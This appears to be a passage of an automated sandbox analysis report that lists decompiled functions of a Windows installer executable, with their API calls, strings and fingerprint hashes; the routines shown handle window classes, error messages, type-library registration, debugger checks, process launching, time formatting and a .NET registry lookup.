Opcode ID: f6208e6fe33eca672dee3c9acfed42d7fbbd8fd5d96c5f2240b38ef860f24016
Instruction ID: 6641462a91bbea351ddec20e413cadf29559210fe3152e4b24b6a5c750fc2ada
Opcode Fuzzy Hash: f6208e6fe33eca672dee3c9acfed42d7fbbd8fd5d96c5f2240b38ef860f24016
Instruction Fuzzy Hash: 5A31A970A00209ABDB11EB95C942BDEBBB5AF45305F50442BF800B73D2D7785F09C768

Uniqueness

Uniqueness Score: -1.00%

Function 004163F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004163F8(intOrPtr* __eax, void* __edi, void* __esi, void* __ebp) {
				char _v8;
				char _v12;
				struct _WNDCLASSA _v52;
				char _v116;
				struct _WNDCLASSA _v156;
				intOrPtr _v164;
				signed char _v185;
				void* __ebx;
				struct HINSTANCE__* _t32;
				signed int _t33;
				signed int _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t55;
				intOrPtr* _t62;

				_t76 = __esi;
				_t75 = __edi;
				_t62 = __eax;
				 *((intOrPtr*)( *__eax + 0x5c))();
				if(_v164 == 0 && (_v185 & 0x00000040) != 0) {
					_v12 =  *((intOrPtr*)(__eax + 8));
					_v8 = 0xb;
					E00408D0C(__eax, 0xf02f, 1, __edi, __esi, 0,  &_v12);
					E0040311C();
				}
				 *((intOrPtr*)(_t62 + 0xac)) = _v156.lpfnWndProc;
				_t32 =  *0x49a014; // 0x400000
				_t33 = GetClassInfoA(_t32,  &_v116,  &_v52);
				asm("sbb eax, eax");
				_t35 =  ~( ~_t33);
				if(_t35 == 0 || E00413624 != _v52.lpfnWndProc) {
					if(_t35 != 0) {
						_t55 =  *0x49a014; // 0x400000
						UnregisterClassA( &_v116, _t55);
					}
					_v156.lpfnWndProc = E00413624;
					_t36 =  *0x49a014; // 0x400000
					_v156.hInstance = _t36;
					_v156.lpszClassName =  &_v116;
					if(RegisterClassA( &_v156) == 0) {
						E00408C9C(_t62, 0xf02c, 1, _t75, _t76);
						E0040311C();
					}
				}
				 *0x4982d8 = _t62;
				_t64 =  *_t62;
				 *((intOrPtr*)( *_t62 + 0x60))();
				if( *((intOrPtr*)(_t62 + 0xc0)) == 0) {
					_t64 = 0xf02d;
					E00408C9C(_t62, 0xf02d, 1, _t75, _t76);
					E0040311C();
				}
				E00407524( *((intOrPtr*)(_t62 + 0x40)));
				 *((intOrPtr*)(_t62 + 0x40)) = 0;
				E0041836C(_t62);
				return E00415228(_t62, E0041A1D0( *((intOrPtr*)(_t62 + 0x44)), _t62, _t64, _t75, _t76), 0x30, 1);
			}

0x004163f8
0x004163f8
0x004163ff
0x00416407
0x0041640f
0x0041641b
0x00416422
0x00416440
0x00416445
0x00416445
0x0041644e
0x00416461
0x00416467
0x0041646e
0x00416470
0x00416474
0x00416486
0x00416488
0x00416493
0x00416493
0x00416498
0x004164a0
0x004164a5
0x004164ad
0x004164be
0x004164cc
0x004164d1
0x004164d1
0x004164be
0x004164d6
0x004164e0
0x004164e2
0x004164ec
0x004164ee
0x004164fa
0x004164ff
0x004164ff
0x00416507
0x0041650e
0x00416513
0x00416537

APIs

GetClassInfoA.USER32 ref: 00416467
UnregisterClassA.USER32 ref: 00416493
RegisterClassA.USER32 ref: 004164B6

Strings

@, xrefs: 00416411

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 0a8cc3b2f17ac4381349db0350fb2ff2171dc7f48e36bafdf10ef5e516c740eb
Instruction ID: fa80f34e80ce72a7157469a99740f616e20ddf3543068d20a7a32910f6f97878
Opcode Fuzzy Hash: 0a8cc3b2f17ac4381349db0350fb2ff2171dc7f48e36bafdf10ef5e516c740eb
Instruction Fuzzy Hash: E5318C706042409BD720EF68C985BDB77E5AB98308F00457FFA45DB392DB39D9848B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00404D2A(int __eax) {
				intOrPtr* _t7;
				intOrPtr* _t8;
				signed int _t15;
				signed int _t19;
				intOrPtr _t20;
				unsigned int _t21;
				char* _t29;
				char* _t30;
				void* _t46;

				 *0x49a024 = __eax;
				if( *0x49a034 == 0) {
					goto L5;
				} else {
					_t46 =  *0x49a418 - 1;
					if(_t46 < 0) {
						L17:
						ExitProcess( *0x49a024);
					} else {
						if(_t46 == 0 || __eax != 0) {
							while(1) {
								L5:
								_t7 =  *0x49a028; // 0x404a10
								_t8 = _t7;
								if(_t8 == 0) {
									break;
								}
								 *0x49a028 = 0;
								 *_t8();
							}
							if( *0x49a02c != 0) {
								_t19 =  *0x49a024; // 0x0
								_t29 = "  at 00000000";
								do {
									_t2 = _t19 % 0xa;
									_t19 = _t19 / 0xa;
									 *_t29 = _t2 + 0x30;
									_t29 = _t29 - 1;
								} while (_t19 != 0);
								_t30 = 0x498090;
								_t20 =  *0x49a02c; // 0x0
								_t21 = _t20 - 0x40121c;
								do {
									 *_t30 =  *((intOrPtr*)((_t21 & 0x0000000f) + 0x404e44));
									_t30 = _t30 - 1;
									_t21 = _t21 >> 4;
								} while (_t21 != 0);
								if( *0x49a035 != 0) {
									E0040500C(0x49a208, "Runtime error     at 00000000");
									E00404F8F();
								} else {
									MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
								}
							}
							E00404CF0(0x49a03c);
							E00404CF0(0x49a208);
							E00401A90();
							if( *0x49a418 == 0) {
								E0040331C();
								goto L17;
							}
						}
					}
				}
				E0040331C();
				 *0x49a418 = 0;
				_t15 =  *0x49a024; // 0x0
				asm("sbb eax, eax");
				return  ~_t15 + 1;
			}

0x00404d2c
0x00404d38
0x00000000
0x00404d3a
0x00404d3a
0x00404d41
0x00404e07
0x00404e0d
0x00404d47
0x00404d47
0x00404d51
0x00404d51
0x00404d51
0x00404d56
0x00404d58
0x00000000
0x00000000
0x00404d5c
0x00404d62
0x00404d62
0x00404d6d
0x00404d6f
0x00404d74
0x00404d7e
0x00404d80
0x00404d80
0x00404d85
0x00404d87
0x00404d88
0x00404d8c
0x00404d91
0x00404d96
0x00404d9b
0x00404da6
0x00404da8
0x00404da9
0x00404da9
0x00404db5
0x00404dd6
0x00404ddb
0x00404db7
0x00404dc5
0x00404dc5
0x00404db5
0x00404de5
0x00404def
0x00404df4
0x00404e00
0x00404e02
0x00000000
0x00404e02
0x00404e00
0x00404d47
0x00404d41
0x00404e12
0x00404e17
0x00404e1e
0x00404e25
0x00404e41

APIs

MessageBoxA.USER32 ref: 00404DC5
ExitProcess.KERNEL32 ref: 00404E0D

Strings

Error, xrefs: 00404DB9
Runtime error at 00000000, xrefs: 00404DBE, 00404DD1

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF

Uniqueness

Uniqueness Score: -1.00%

Function 00455A40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00455A40(void* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr* _t23;
				intOrPtr _t39;
				void* _t45;
				void* _t46;
				intOrPtr _t47;

				_t43 = __esi;
				_t42 = __edi;
				_t45 = _t46;
				_t47 = _t46 + 0xfffffff4;
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t32 = __eax;
				_push(_t45);
				_push(0x455b28);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				E0042C7A8(__eax,  &_v16);
				_v8 = E00403CA4(_v16);
				if(_v8 == 0) {
					E00408BE0();
				}
				_push(_t45);
				_push(0x455b0b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t47;
				_push( &_v12);
				_t19 = _v8;
				_push(_t19);
				L0042CC08();
				_t49 = _t19;
				if(_t19 != 0) {
					E00452810("LoadTypeLib", _t32, _t19, _t42, _t43, _t49);
				}
				_push(_t45);
				_push(0x455aed);
				_push( *[fs:edx]);
				 *[fs:edx] = _t47;
				_push(0);
				_push(_v8);
				_t21 = _v12;
				_push(_t21);
				L0042CC10();
				_t50 = _t21;
				if(_t21 != 0) {
					E00452810("RegisterTypeLib", _t32, _t21, _t42, _t43, _t50);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_t23 = _v12;
				return  *((intOrPtr*)( *_t23 + 8))(_t23, E00455AF4);
			}

0x00455a40
0x00455a40
0x00455a41
0x00455a43
0x00455a47
0x00455a48
0x00455a4b
0x00455a4e
0x00455a52
0x00455a53
0x00455a58
0x00455a5b
0x00455a63
0x00455a70
0x00455a77
0x00455a79
0x00455a79
0x00455a80
0x00455a81
0x00455a86
0x00455a89
0x00455a8f
0x00455a90
0x00455a93
0x00455a94
0x00455a99
0x00455a9b
0x00455aa4
0x00455aa4
0x00455aab
0x00455aac
0x00455ab1
0x00455ab4
0x00455ab7
0x00455abc
0x00455abd
0x00455ac0
0x00455ac1
0x00455ac6
0x00455ac8
0x00455ad1
0x00455ad1
0x00455ad8
0x00455adb
0x00455ae3
0x00455aec

APIs

Part of subcall function 0042C7A8: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7CC

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455A94
RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455AC1

Strings

RegisterTypeLib, xrefs: 00455ACC
LoadTypeLib, xrefs: 00455A9F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 1312246647-2435364021
Opcode ID: 42f504823ca98d41addfabf493d63b08436e80606897518654ecf2745b8768bc
Instruction ID: a107af06ca24713579a9f59546026f32d234bf23ddff17bfe20c85435272d302
Opcode Fuzzy Hash: 42f504823ca98d41addfabf493d63b08436e80606897518654ecf2745b8768bc
Instruction Fuzzy Hash: CB118130A00A04AFDB11EFA6CDA6E6EB7ADEF89705B108476B904D7652DA789D04CA14

Uniqueness

Uniqueness Score: -1.00%

Function 00455F98 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00455F98(struct HWND__* __eax, char __edx, void* __ebp) {
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t15;
				void* _t22;
				intOrPtr* _t23;
				struct HWND__* _t29;
				void* _t30;

				_v20 = __edx;
				_t29 = __eax;
				_t22 = SendMessageA(__eax, 0xb06, 0, 0);
				if(_t22 != 0x5030b00) {
					_v28 = _t22;
					_v24 = 0;
					_v20 = 0x5030b00;
					_v16 = 0;
					E00408C20(_t22, "Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)", 1, 0x49afbc, _t29, 1,  &_v28);
					E0040311C();
				}
				 *0x49afac = 1;
				 *0x49afb8 = _t29;
				 *0x49afbc = E0041F468(E004563D8, 0x455f8c);
				_t34 =  *0x49afbc;
				if( *0x49afbc == 0) {
					E004526A4("Failed to create DebugClientWnd", _t22, 0x49afbc, _t29, _t34);
				}
				_t30 = 4;
				_t23 = 0x498934;
				do {
					E0042E868( *0x49afbc,  *_t23);
					_t23 = _t23 + 4;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				_t15 =  *0x49afb8; // 0x0
				return SendMessageA(_t15, 0xb00,  *0x49afbc, 0);
			}

0x00455f9e
0x00455fa1
0x00455fb7
0x00455fbf
0x00455fc1
0x00455fc5
0x00455fca
0x00455fd2
0x00455fea
0x00455fef
0x00455fef
0x00455ff4
0x00455ffb
0x00456011
0x00456013
0x00456016
0x0045601d
0x0045601d
0x00456022
0x00456027
0x0045602c
0x00456030
0x00456035
0x00456038
0x00456038
0x00456049
0x0045605a

APIs

SendMessageA.USER32 ref: 00455FB2
SendMessageA.USER32 ref: 0045604F

Strings

Failed to create DebugClientWnd, xrefs: 00456018
Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00455FDE

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
API String ID: 3850602802-3720027226
Opcode ID: 7b21834906d2744511e81f2a6d729ae7c2caa483f287d855b2d864865352051c
Instruction ID: 8101da392541b400ae5b795579f0d3e58c1a7d4edfb3ba9888df2f93032852a6
Opcode Fuzzy Hash: 7b21834906d2744511e81f2a6d729ae7c2caa483f287d855b2d864865352051c
Instruction Fuzzy Hash: 5E11E3B0604350AFE710EB698C81B5B7B989F55718F45443BF984DB3C3D7B98818CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00494630 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59
processCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00494630(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				struct _STARTUPINFOA _v76;
				struct _PROCESS_INFORMATION _v92;
				int _t20;
				intOrPtr _t26;
				intOrPtr _t38;
				void* _t44;

				_push(__edi);
				_v8 = 0;
				_t41 = __edx;
				_t29 = __eax;
				_push(_t44);
				_push(0x4946d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44 + 0xffffffa8;
				_push(0x4946ec);
				_push(__eax);
				_push(E004946F8);
				_push(__edx);
				E00403634();
				E00402934( &_v76, 0x44);
				_v76.cb = 0x44;
				_t20 = CreateProcessA(0, E00403738(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92);
				_t47 = _t20;
				if(_t20 == 0) {
					_t26 =  *0x49adb0; // 0x227dc80
					E00494588(_t26, _t29, 0, __edi, _t41, _t47);
				}
				_t8 =  &(_v92.hThread); // 0x494738
				CloseHandle( *_t8);
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E004946DA);
				return E00403400( &_v8);
			}

0x00494638
0x0049463b
0x0049463e
0x00494640
0x00494644
0x00494645
0x0049464a
0x0049464d
0x00494650
0x00494655
0x00494656
0x0049465b
0x00494664
0x00494673
0x00494678
0x0049469e
0x004946a3
0x004946a5
0x004946a7
0x004946ac
0x004946ac
0x004946b1
0x004946b5
0x004946bf
0x004946c2
0x004946c5
0x004946d2

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004946F8,?,004946EC,00000000,004946D3), ref: 0049469E
CloseHandle.KERNEL32(8GI,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004946F8,?,004946EC,00000000), ref: 004946B5

Part of subcall function 00494588: GetLastError.KERNEL32(00000000,00494620,?,?,?,?), ref: 004945AC

Strings

D, xrefs: 00494678
8GI, xrefs: 004946B1, 004946B4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: 8GI$D
API String ID: 3798668922-2929899198
Opcode ID: 5762a93c52b3abf7e00052e7c186dd083a7c919334be8cfda6e4d8fd860ac32c
Instruction ID: 91b9c8945242908719221f4f270b117abe2ae84f1159afd9c81a063f896f5909
Opcode Fuzzy Hash: 5762a93c52b3abf7e00052e7c186dd083a7c919334be8cfda6e4d8fd860ac32c
Instruction Fuzzy Hash: DE015EB1604248AFDB00EB91CC42E9FBBACEB49714F51007AB504E7691D67C9E158668

Uniqueness

Uniqueness Score: -1.00%

Function 00476E0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00476E0C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t22;
				struct HWND__* _t25;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t43;
				void* _t44;
				intOrPtr _t45;

				_t43 = _t44;
				_t45 = _t44 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_push(_t43);
				_push(0x476ed7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45;
				_v8 = E00476EF8(1);
				_push(_t43);
				_push(0x476eb0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45;
				_v20 =  *((intOrPtr*)(_v8 + 4));
				_v16 = 0;
				E004078D4("Wnd=$%x", 0,  &_v20,  &_v12);
				_t22 =  *0x49a628; // 0x2262410
				E004242AC(_t22, _v12, __edi);
				while(1) {
					E004767B0();
					_t25 = GetFocus();
					_t38 =  *0x49a628; // 0x2262410
					if(_t25 ==  *((intOrPtr*)(_t38 + 0x20)) && GetKeyState(0x7a) < 0) {
						break;
					}
					WaitMessage();
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00476EB7);
				return E00402B58(_v8);
			}

0x00476e0d
0x00476e0f
0x00476e14
0x00476e17
0x00476e1c
0x00476e1d
0x00476e22
0x00476e25
0x00476e34
0x00476e39
0x00476e3a
0x00476e3f
0x00476e42
0x00476e4f
0x00476e52
0x00476e60
0x00476e68
0x00476e6d
0x00476e72
0x00476e72
0x00476e77
0x00476e7c
0x00476e85
0x00000000
0x00000000
0x00476e93
0x00476e93
0x00476e9c
0x00476e9f
0x00476ea2
0x00476eaf

APIs

Part of subcall function 004242AC: SetWindowTextA.USER32(?,00000000), ref: 004242C4

GetFocus.USER32(?,00000000,00476EB0,?,00000000,00476ED7,?,?,00000001,00000000,?,?,?,0047E5AA,00000000,0047F4AB), ref: 00476E77
GetKeyState.USER32(0000007A), ref: 00476E89
WaitMessage.USER32(?,00000000,00476EB0,?,00000000,00476ED7,?,?,00000001,00000000,?,?,?,0047E5AA,00000000,0047F4AB), ref: 00476E93

Strings

Wnd=$%x, xrefs: 00476E5B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FocusMessageStateTextWaitWindow
String ID: Wnd=$%x
API String ID: 1381870634-2927251529
Opcode ID: 487d88f660e2db342b28d8ea9a610eec796a45953038bcf55554d2f05921c81e
Instruction ID: ab57e28be1e4fcc0e1ddb7abdb903e3276d19df6d4f808f79b30ce90165c1ed7
Opcode Fuzzy Hash: 487d88f660e2db342b28d8ea9a610eec796a45953038bcf55554d2f05921c81e
Instruction Fuzzy Hash: 8611A774604644AFC700EF65DC41EDE77BAEB09308B5284BAF808E3681D7386D00CB7A

Uniqueness

Uniqueness Score: -1.00%

Function 0046D2B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046D2B0(FILETIME* __eax, void* __edx) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				struct _SYSTEMTIME _v76;
				struct _FILETIME _v84;
				void* _t41;
				struct _FILETIME* _t46;

				_t41 = __edx;
				FileTimeToLocalFileTime(__eax, _t46);
				if(FileTimeToSystemTime( &_v84,  &_v76) == 0) {
					return E00403494(_t41, "(invalid)");
				}
				_v60 = _v76.wYear & 0x0000ffff;
				_v56 = 0;
				_v52 = _v76.wMonth & 0x0000ffff;
				_v48 = 0;
				_v44 = _v76.wDay & 0x0000ffff;
				_v40 = 0;
				_v36 = _v76.wHour & 0x0000ffff;
				_v32 = 0;
				_v28 = _v76.wMinute & 0x0000ffff;
				_v24 = 0;
				_v20 = _v76.wSecond & 0x0000ffff;
				_v16 = 0;
				_v12 = _v76.wMilliseconds & 0x0000ffff;
				_v8 = 0;
				return E004078D4("%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u", 6,  &_v60, _t41);
			}

0x0046d2b4
0x0046d2b8
0x0046d2ce
0x00000000
0x0046d34f
0x0046d2d6
0x0046d2da
0x0046d2e4
0x0046d2e8
0x0046d2f2
0x0046d2f6
0x0046d300
0x0046d304
0x0046d30e
0x0046d312
0x0046d31c
0x0046d320
0x0046d32a
0x0046d32e
0x00000000

APIs

FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D2B8
FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D2C7

Strings

(invalid), xrefs: 0046D34A
%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 0046D33C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: 36d9bebcf48fc4e47daec87f7ec0e8c2e6e4ef91435bbded2fa0d0d9e98eec99
Instruction ID: a2bc08620057326219c40d993f6a8a3ba00e8e6f5ef9a56d20be324eed520211
Opcode Fuzzy Hash: 36d9bebcf48fc4e47daec87f7ec0e8c2e6e4ef91435bbded2fa0d0d9e98eec99
Instruction Fuzzy Hash: DD11FBA490C3919ED340DF6AC44432FBBE4AB89704F04496EF9D8D6381E779C988DB67

Uniqueness

Uniqueness Score: -1.00%

Function 00458700 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00458700(signed int __eax, void* __ecx, void* __edx, void* __ebp) {
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				signed int _t33;

				_push(__ecx);
				_t31 = __edx;
				_t22 = __eax;
				_t33 = __eax & 0x0000007f;
				if( *((intOrPtr*)(0x49afe0 + _t33 * 4)) == 0) {
					if(E0042DD1C(__eax, "SOFTWARE\\Microsoft\\.NETFramework", 0x80000002,  &_v16, 1, 0) == 0) {
						E0042DC4C();
						RegCloseKey(_v16);
					}
					_t37 =  *((intOrPtr*)(0x49afe0 + _t33 * 4));
					if( *((intOrPtr*)(0x49afe0 + _t33 * 4)) == 0) {
						E004526A4(".NET Framework not found", _t22, _t31, _t33, _t37);
					}
				}
				return E00403494(_t31,  *((intOrPtr*)(0x49afe0 + _t33 * 4)));
			}

0x00458703
0x00458704
0x00458706
0x0045870a
0x00458715
0x00458733
0x00458744
0x0045874d
0x0045874d
0x00458752
0x0045875a
0x00458761
0x00458761
0x0045875a
0x00458778

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,0045883D,00000000,004589F5,?,00000000,00000000,00000000), ref: 0045874D

Strings

.NET Framework not found, xrefs: 0045875C
InstallRoot, xrefs: 0045873C
SOFTWARE\Microsoft\.NETFramework, xrefs: 00458720

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
API String ID: 47109696-2631785700
Opcode ID: 0d67f79db1d11d0032434b1f69172327e0c7ca74904ec16c403dac35e76e3c37
Instruction ID: 86385215b14aa4bd85385ed386ba8ee4b547d3e34f26af389d27f961ba584293
Opcode Fuzzy Hash: 0d67f79db1d11d0032434b1f69172327e0c7ca74904ec16c403dac35e76e3c37
Instruction Fuzzy Hash: B5F0AF727001109BC710EB1ADC45B4A6699DBD9356F70443FF980E725ACF78CC06866E

Uniqueness

Uniqueness Score: -1.00%

Function 00481B00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00481B00(void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
